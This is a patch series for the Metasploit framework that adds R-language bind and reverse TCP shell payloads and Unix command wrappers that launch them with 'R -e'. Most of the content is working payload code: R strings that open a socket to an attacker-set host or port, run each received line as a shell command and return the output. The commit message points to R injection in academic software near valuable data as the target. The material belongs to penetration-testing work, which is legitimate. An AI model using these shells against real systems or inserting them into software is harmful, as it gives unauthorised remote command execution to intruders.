From d76616e8e8c978462c277c556e19711467fdde32 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sat, 19 Aug 2017 05:57:45 -0400 Subject: [PATCH 1/4] Reverse and bind shells in R Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and 6, provides stateless sessions which wont change the cwd when cd is invoked since each command invocation actually spawns a pipe to execute that specific line's invocation. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitions --- modules/payloads/singles/r/shell_bind_tcp.rb | 43 ++++++++++++++++++ .../payloads/singles/r/shell_reverse_tcp.rb | 45 +++++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 modules/payloads/singles/r/shell_bind_tcp.rb create mode 100644 modules/payloads/singles/r/shell_reverse_tcp.rb diff --git a/modules/payloads/singles/r/shell_bind_tcp.rb b/modules/payloads/singles/r/shell_bind_tcp.rb new file mode 100644 index 0000000000..532b2dbe8a --- /dev/null +++ b/modules/payloads/singles/r/shell_bind_tcp.rb @@ -0,0 +1,43 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/payload/r' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 516 + + include Msf::Payload::Single + include Msf::Payload::R + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'R Command Shell, Bind TCP', + 'Description' => 'Continually listen for a connection and spawn a command shell via R', + 'Author' => [ 'RageLtMan' ], + 'License' => MSF_LICENSE, + 'Platform' => 'r', + 'Arch' => ARCH_R, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'r', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + return prepends(r_string) + end + + def r_string + return "s<-socketConnection(port=#{datastore['LPORT']}," + + "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" + + "(pipe(readLines(s,1))),s)}" + end +end diff --git a/modules/payloads/singles/r/shell_reverse_tcp.rb b/modules/payloads/singles/r/shell_reverse_tcp.rb new file mode 100644 index 0000000000..ca8b7c2235 --- /dev/null +++ b/modules/payloads/singles/r/shell_reverse_tcp.rb @@ -0,0 +1,45 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/payload/r' +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 516 + + include Msf::Payload::Single + include Msf::Payload::R + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'R Command Shell, Reverse TCP', + 'Description' => 'Connect back and create a command shell via R', + 'Author' => [ 'RageLtMan' ], + 'License' => MSF_LICENSE, + 'Platform' => 'r', + 'Arch' => ARCH_R, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'r', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + return prepends(r_string) + end + + def r_string + lhost = datastore['LHOST'] + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," + + "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" + + "(pipe(readLines(s, 1))),s)}" + end +end From 0145fc397276cbd4bdf9fdd5c059b7118a65026c Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sat, 19 Aug 2017 06:37:09 -0400 Subject: [PATCH 2/4] payload/r.rb and UUID update --- lib/msf/core/payload/r.rb | 14 ++++++++++++++ lib/msf/core/payload/uuid.rb | 6 ++++-- 2 files changed, 18 insertions(+), 2 deletions(-) create mode 100644 lib/msf/core/payload/r.rb diff --git a/lib/msf/core/payload/r.rb b/lib/msf/core/payload/r.rb new file mode 100644 index 0000000000..730b01adde --- /dev/null +++ b/lib/msf/core/payload/r.rb @@ -0,0 +1,14 @@ +# -*- coding: binary -*- +require 'msf/core' + +module Msf::Payload::R + + def initialize(info = {}) + super(info) + end + + def prepends(buf) + buf + end + +end diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb index 6b439989ad..acc100406a 100644 --- a/lib/msf/core/payload/uuid.rb +++ b/lib/msf/core/payload/uuid.rb @@ -42,7 +42,8 @@ class Msf::Payload::UUID 23 => ARCH_ZARCH, 24 => ARCH_AARCH64, 25 => ARCH_MIPS64, - 26 => ARCH_PPC64LE + 26 => ARCH_PPC64LE, + 27 => ARCH_R } Platforms = { @@ -69,7 +70,8 @@ class Msf::Payload::UUID 20 => 'js', 21 => 'python', 22 => 'nodejs', - 23 => 'firefox' + 23 => 'firefox', + 24 => 'r' } # The raw length of the UUID structure From 7ab097a784f4d83469fa930a41b59f4395bd5d6d Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sun, 20 Aug 2017 21:25:57 -0400 Subject: [PATCH 3/4] Unix cmd versions of R payloads Use R to connect back from a unix shell. Notes: We need to DRY this up - tons of copy pasta here, when we should really be instantiating the language specific payloads and just wrapping them with CLI execution strings. Testing: None, yet, just did the quick port to wrap this and push to CI now that rex-arch #4 is in. --- modules/payloads/singles/cmd/unix/bind_r.rb | 48 ++++++++++++++++++ .../payloads/singles/cmd/unix/reverse_r.rb | 49 +++++++++++++++++++ 2 files changed, 97 insertions(+) create mode 100644 modules/payloads/singles/cmd/unix/bind_r.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_r.rb diff --git a/modules/payloads/singles/cmd/unix/bind_r.rb b/modules/payloads/singles/cmd/unix/bind_r.rb new file mode 100644 index 0000000000..7d459efd63 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/bind_r.rb @@ -0,0 +1,48 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/payload/r' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 516 + + include Msf::Payload::Single + include Msf::Payload::R + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Bind TCP (via R)', + 'Description' => 'Continually listen for a connection and spawn a command shell via R', + 'Author' => [ 'RageLtMan' ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'ruby', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + return prepends(r_string) + end + + def prepends(r_string) + return "R -e \"#{r_string}\"" + end + + def r_string + return "s<-socketConnection(port=#{datastore['LPORT']}," + + "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" + + "(pipe(readLines(s,1))),s)}" + end +end diff --git a/modules/payloads/singles/cmd/unix/reverse_r.rb b/modules/payloads/singles/cmd/unix/reverse_r.rb new file mode 100644 index 0000000000..f03504d5ef --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_r.rb @@ -0,0 +1,49 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/payload/r' +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 516 + + include Msf::Payload::Single + include Msf::Payload::R + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP (via R)', + 'Description' => 'Connect back and create a command shell via R', + 'Author' => [ 'RageLtMan' ], + 'License' => MSF_LICENSE, + 'Platform' => 'r', + 'Arch' => ARCH_R, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'r', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + return prepends(r_string) + end + + def prepends(r_string) + return "R -e \"#{r_string}\"" + end + + def r_string + lhost = datastore['LHOST'] + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," + + "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" + + "(pipe(readLines(s, 1))),s)}" + end +end From 2873a899dbff392bb357435d1fdb7aac991557e6 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Mon, 21 Aug 2017 03:39:03 -0400 Subject: [PATCH 4/4] Address msftidy complaint --- modules/payloads/singles/cmd/unix/reverse_r.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/cmd/unix/reverse_r.rb b/modules/payloads/singles/cmd/unix/reverse_r.rb index f03504d5ef..cc7eeecde8 100644 --- a/modules/payloads/singles/cmd/unix/reverse_r.rb +++ b/modules/payloads/singles/cmd/unix/reverse_r.rb @@ -37,7 +37,7 @@ module MetasploitModule def prepends(r_string) return "R -e \"#{r_string}\"" - end + end def r_string lhost = datastore['LHOST']